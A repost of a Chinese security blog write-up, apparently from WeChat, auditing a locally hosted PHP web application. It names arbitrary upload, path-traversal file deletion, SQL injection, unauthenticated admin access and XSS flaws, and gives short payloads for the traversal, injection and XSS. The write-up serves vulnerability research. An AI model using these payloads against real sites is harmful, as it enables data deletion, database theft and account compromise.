|
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
作者@G3et继上篇文章《一个IP Getshell》简单代码审计一波:以下打码有漏,但是无妨,为本地搭建的,非真实站点。
后台任意文件上传
/templates/img_check.php
先找到文件上传判断方式,这里$arrType表示的文件类型的允许列表中
抓包看见Content-Type类型是application/octet-stream
后台任意文件删除
漏洞点
if (! empty($_GET['fname'])) {
unlink($dir.$_GET['fname']);
}
跨目录到上级来尝试删除
http://127.0.0.1/templates/img_check.php?fname=../1.php
后台sql注入
找到代码地址定位关键参数:
/templates/message_check.php?search_cat=item&keyword=1
搜索框处验证,点击查询会出现的返回了所有结果,这个也是默认点击查询的返回结果,说明返回正常
' and 1=1--'
' and 1=2--'
' and sleep(5) --+'
未授权访问后台注入
templates/message_count_item.php?s=webname&k=1
require_once ('../includes/page_validate.php');
去包含了验证登录授权的文件,但是上面文件并没有,所以造成了未授权的情况
XSS
templates/message_count_item.php?s=webname&k=1
这里的$_GET[‘k’] 和 $keyword 都是指获取到的搜索关键词
构造xss
<script>alert("G3et")</script>
文章来源:G3et博客
原文地址:https://www.g3et.cn/2023/ji-shang-zhang-jian-dan-dai-ma-shen-ji-yi-bo
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
知 识 星 球
推 荐 阅 读
原文始发于微信公众号(潇湘信安):继上章简单代码审计一波
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论